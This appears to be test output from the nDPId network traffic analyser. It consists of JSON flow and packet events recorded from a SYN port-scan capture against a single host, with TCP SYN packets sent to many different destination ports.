+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGcAACoGxgusEAAIQA2GNIzSlZTdUoMYAAAAAGACDACW+gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAshTcAADYGjTusEAAIQA2GNIzSAaDdUoMYAAAAAGACDAAq7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsW+wAADIGuoasEAAIQA2GNIzSB87dUoMYAAAAAGACDAAkwQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4OUAADYGMY2sEAAIQA2GNIzSABTdUoMYAAAAAGACDAAsewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsLA4AAC8G7WSsEAAIQA2GNIzSBQfdUoMYAAAAAGACEAAjiAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oAAADEGLPKsEAAIQA2GNIzS387dUoMYAAAAAGACCABQwAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdcAACkGoZusEAAIQA2GNIzSAh3dUoMYAAAAAGACCAAucgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlkAADIG2BmsEAAIQA2GNIzSBUjdUoMYAAAAAGACDAAnRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3cAACgGDPysEAAIQA2GNIzSDNPdUoMYAAAAAGACBAAnvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsMosAADIG4+esEAAIQA2GNIzSBHndUoMYAAAAAGACDAAoFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5AAADIGVuKsEAAIQA2GNIzSCI\/dUoMYAAAAAGACDAAkAAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAszeUAADsGP42sEAAIQA2GNIzSTiDdUoMYAAAAAGACEADabgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zcAADMGGjusEAAIQA2GNIzSBAvdUoMYAAAAAGACEAAkhAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsJtYAADsG5pysEAAIQA2GNIzSAFjdUoMYAAAAAGACEAAoNwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsbMEAADkGorGsEAAIQA2GNIzSBB\/dUoMYAAAAAGACCAAscAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsfVEAADAGmyGsEAAIQA2GNIzSgATdUoMYAAAAAGACBAC0igAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZMAADkG3d+sEAAIQA2GNIzSBDXdUoMYAAAAAGACCAAsWgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs3h4AADoGMFSsEAAIQA2GNIzSGabdUoMYAAAAAGACDAAS6QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060493,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_packet_id":1,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060493,"pkt":"ACYLMQczACWzv5HuCABFAAAszXIAADkGQgCsEAAIQA2GNIzS3aHdUoMYAAAAAGACCABS7QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsaFcAACYGuhusEAAIQA2GNIzSF0ndUoMYAAAAAGACDAAVRgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCcAACkGf0usEAAIQA2GNIzS4uDdUoMYAAAAAGACCABNrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/IAADoG\/oCsEAAIQA2GNIzSI\/fdUoMYAAAAAGACDAAImAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzkAADAG6TmsEAAIQA2GNIzSBGbdUoMYAAAAAGACBAAwKQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsdksAADkGmSesEAAIQA2GNIzSS1PdUoMYAAAAAGACCADlOwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyvwAADAGTXasEAAIQA2GNIzSAgHdUoMYAAAAAGACBAAyjgAAAgQFtA=="} 